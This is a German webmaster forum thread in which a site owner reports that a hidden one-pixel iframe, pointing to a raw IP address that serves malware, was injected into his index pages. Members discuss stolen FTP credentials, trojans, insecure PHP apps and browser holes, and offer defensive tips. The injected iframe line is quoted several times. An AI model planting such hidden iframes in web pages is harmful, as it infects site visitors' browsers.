Gehackt

Beitrag von **Thomas B** » 22.05.2007, 10:38

Hallo,

hatte heute Morgen schon mein erstes schönes Erlebnis:

In meinem Webpack liegen 5 Domains - alles .html Seiten.

In jede der index.html war kurz unter dem Body folgender Code eingefügt:

<body><iframe src='https://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Der Provider ( Host Europe ) sagt, ich soll so schnell als möglich die FTP Passwörter ändern. Habe ich auch getan, aber wie kann ich mich dagegen schützen, dass so etwas nicht wieder passiert?

Hat vielleicht einer einen guten Tipp?

von **Anzeige von ABAKUS** »

Beitrag von **Glenmor** » 22.05.2007, 11:39

Verwendest Du ein CMS? Wenn ja Update durchführen den da gibt es desöfteren Zugriffsmöglichkeiten von außen. Ansonsten sicher Passwörter verwenden zB: sowas "^7yK02l'@wuY!:JE" und die sicher speichern https://keepass.info/ weil sonst bringen die sicheren Passwörter nichts. Andere Möglichkeit du hast unbewust den Zugriff von außen (Stichwort chmod 777) erlaupt. Oder es gibt eine Zugriffmöglichkeit über einen andern Server Deines Providers.

Beitrag von **Boa** » 22.05.2007, 14:18

https://www.abakus-internet-marketing.d ... art-0.html

Der Angreifer kommt über ftp hinein, nachdem er sich mit einem Virus Namens
Exploit.HTML.Iframe.FileDownload Zugriff verschafft hat.

von **Anzeige von ABAKUS** »

Beitrag von **Ibu400** » 22.05.2007, 16:01

warum schaltet ihr FTP nicht einfach ab?

Beitrag von **semtex** » 22.05.2007, 17:20

Verhindern kann man es im Grunde nicht, man kann seinen Content nur so gut wie möglcih versuchen abzusichern.

Um sich bei Confixx, Mysql, Mail oder FTP einzuloggen, benötigt man wie jeder weiss den Usernamen und das Passwort.
Leider machen es sich viele Provider dabei sehr einfach, indem sie ihr System so konfigurieren, dass der Verzeichnisname gleich dem Usernamen ist.
Man muss daher nur auf dem jeweiligen Account eine Erromeldung erzeugen und schon hat man den Verzeichnisnamen, bzw. den Usernamen und den ersten Parameter um sich in einen Dienst einzuloggen.

Parse error: parse error, unexpected T_VARIABLE in /home/vhosts/web30/htdocs/hallo.php

Leider machen auch sehr viele User den Fehler und nehmen für alle Logins das gleiche Passwort, auch für den Zugriff auf diverse Foren und Webmastertools.
Ich könnte fast Wetten, das 20% aller hier im Forum angemeldeten User das gleiche Passwort auch für ihren Account verwenden.
So kommt eins zum anderen, hat man nun schon den Usernamen, so ist es um Faktor X einfacher jeden Account zu knacken.

Beitrag von **semtex** » 22.05.2007, 17:22

Ibu400 hat geschrieben:warum schaltet ihr FTP nicht einfach ab?

Nicht jeder hat Rootrechte auf seinem System !?

Verhindern kann man es im Grunde sowieso nicht, man kann seinen Content nur so gut wie möglich versuchen abzusichern.

Um sich bei Confixx, Mysql, Mail oder FTP einzuloggen, benötigt man wie jeder weiss den Usernamen und das Passwort.
Leider machen es sich viele Provider dabei auch sehr einfach, indem sie ihr System so konfigurieren, dass der Verzeichnisname gleich dem Usernamen ist.
Man muss daher nur auf dem jeweiligen Account eine Erromeldung erzeugen und schon hat man den Verzeichnisnamen, bzw. den Usernamen und den ersten Parameter um sich in einen Dienst einzuloggen.

Parse error: parse error, unexpected T_VARIABLE in /home/vhosts/web30/htdocs/hallo.php

Leider machen auch sehr viele User den Fehler und nehmen für alle Logins das gleiche Passwort, auch für den Zugriff auf diverse Foren und Webmastertools.
Ich könnte fast Wetten, das 20% aller hier im Forum angemeldeten User das gleiche Passwort auch für ihren Account verwenden.
So kommt eins zum anderen, hat man nun schon den Usernamen, so ist es um Faktor X einfacher jeden Account zu knacken.

Beitrag von **Pompom** » 22.05.2007, 17:25

Das hat überhaupt nichts mit FTP zu tun.
Der Exploit.HTML.Iframe.FileDownload virus wird auf dem lokalen Browser ausgeführt und macht nichts anderes, als auf diesem Programm- oder Scriptcode ausführen, ohne das der User es merkt.
Und, dieses Dingens wird über
<body><iframe src='https://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe> geladen, d.h. dies ist ein Angriff auf den lokalen Browser !

Wie das auf den Server kommt ?
I.d.R. durch unsichere (php-) Anwendungen. Hier wird ein sog. Exploit geladen, über das eine Shell installiert wird. Über diese ist dann das Ausführen (fast) beliebiger Betriebssystemkommandos möglich.
Beliebte Anwendungen, über die entsprechende Exploits geladen werden, sind z.B. phpbb, joomla, einige Gallery-Scripts usw.

Beitrag von **semtex** » 22.05.2007, 17:30

In seinem Fall ist es fast klar das es durch ein unsicheres Script oder falsche Zugriffsrechte passiert ist.

Beitrag von **Pompom** » 22.05.2007, 17:34

Ach ja, für die, die es genau wissen wollen, hier das Script, das dann ausgeführt wird.
Falls es einen interessiert, kann er ja gerne mal analysieren, was Thomas B uns da so unterschiebt

*auf Adminwunsch wecheditiert, da Admin-Monitor scheinbar zu schmal ist *

*noch mal editiert, war gar nicht der Admin, war der Mod*

Beitrag von **semtex** » 22.05.2007, 17:38

https://www.spybye.org/index.php?/categories/2-Malware

Beitrag von **Boa** » 22.05.2007, 17:38

Pompom hat geschrieben:Das hat überhaupt nichts mit FTP zu tun.
Der Exploit.HTML.Iframe.FileDownload virus wird auf dem lokalen Browser ausgeführt und macht nichts anderes, als auf diesem Programm- oder Scriptcode ausführen, ohne das der User es merkt.
Und, dieses Dingens wird über
<body><iframe src='https://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe> geladen, d.h. dies ist ein Angriff auf den lokalen Browser !

Wie das auf den Server kommt ?
I.d.R. durch unsichere (php-) Anwendungen. Hier wird ein sog. Exploit geladen, über das eine Shell installiert wird. Über diese ist dann das Ausführen (fast) beliebiger Betriebssystemkommandos möglich.
Beliebte Anwendungen, über die entsprechende Exploits geladen werden, sind z.B. phpbb, joomla, einige Gallery-Scripts usw.

Der übergibt die Zugangsdaten aus dem Filezilla btw Ws-FTP und somit hat der Hacker die benötigten Daten.
In den FTP Logs taucht dann dieser Bot auch auf, das würde er nicht, wenn er über Exploits reinkommt

Beitrag von **semtex** » 22.05.2007, 17:55

Da wird das bekannte mhtml-Sicherheitsloch des Internet Explorer ausgenutzt.
Entweder Active Scripting abschalten, oder mal den Browser wechseln.

Beitrag von **Margin** » 22.05.2007, 18:23

Ist ja nicht so ganz meine Baustelle, aber wär's nicht vielleicht ein Anfang,
wenn er erstmal sämtliche IPs außer seiner eigenen sperrt?
Je nach Zugang evtl. auch alle Ranges außer der eigenen?

Beitrag von **Thomas B** » 24.05.2007, 00:53

Sorry das ich erst jetzt einen Kommentar zu Euren Antworten abgebe, war aber die letzten 1 1/2 Tage damit beschäftigt meinen Rechner platt zu machen und neu aufzusetzen.

Tatsache ist: Ich hatte 3 Trojaner auf meinem Rechner, einer davon "ntos.exe". Diese Sche... Dinger haben 3 Virenprogramme nicht gelöscht bekommen, nur als heftigen Virus klassifiziert. Die Seiten die auf meinem Webpack liegen sind alle rein statischer Natur - kein Php, CMS oder ähnliches. Es war auch immer nur die index betroffen.
Habe jetzt ersteinmal das komplette Windows Update installiert.

@ Pompom: "...was Thomas B uns da so unterschiebt"
Was meinst mit unterschieben?

Beitrag von **Anonymous** » 24.05.2007, 01:26

Thomas B hat geschrieben:@ Pompom: "...was Thomas B uns da so unterschiebt"
Was meinst mit unterschieben?

er meinte was du den Besuchern deiner Webseite unwissentlich mitgegeben hattest...

muss nicht jeden Spruch so ernst nehmen...